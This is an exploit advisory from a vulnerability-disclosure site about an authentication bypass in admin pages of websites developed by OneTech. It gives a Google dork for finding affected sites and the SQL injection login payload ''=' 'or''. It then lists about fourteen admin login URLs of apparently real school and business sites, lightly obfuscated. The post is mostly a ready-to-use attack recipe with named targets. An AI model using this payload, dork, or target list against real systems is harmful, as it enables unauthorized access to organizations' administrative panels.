OneTech bypass adminpage Vulnerability

2015.11.20
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Developed by : OneTech."

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: OneTech bypass adminpage Vulnerability |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://www.onetechbd.com/ |[+] |[+] Google Dork: intext:"Developed by : OneTech." |[+] |[+] Tested on: Windows,Linux | |[+] |[+] Date: 19.11.2015 |[+] |--------------------------------------------------------------| |[+] Examples : |[+] |[+] Exploit: Use '=' 'or' to login. |[+] |[+] http://uihs.edu.bXd/adminmb/login.php |[+] |[+] http://pirojpurgXovths.edu.bd/adminmb/login.php |[+] |[+] http://hss.eduX.bd/adminmb/login.php |[+] |[+] http://psss.eXdu.bd/admin-mb/login.php |[+] |[+] http://km.eXdu.bd/adminmb/login.php |[+] |[+] http://dgsXs.edu.bd/admin-mb/login.php |[+] |[+] http://soXnaMukhihighschool.edu.bd/admin-mb/login.php |[+] |[+] http://sXss.edu.bd/admin-mb/login.php |[+] |[+] http://Xmss.edu.bd/admin-mb/login.php |[+] |[+] http://Atmss.edXu.bd/admin-mb/login.php |[+] |[+] http://aa-oceaXn-air.com/admin/login.php |[+] |[+] http://joypurXmdc.edu.bd/adminmb/login.php |[+] |[+] http://broniXa.com.bd/admin/login.php |[+] |[+] http://swifXt-freight.com/admin/login.php |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : Cloner-47 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top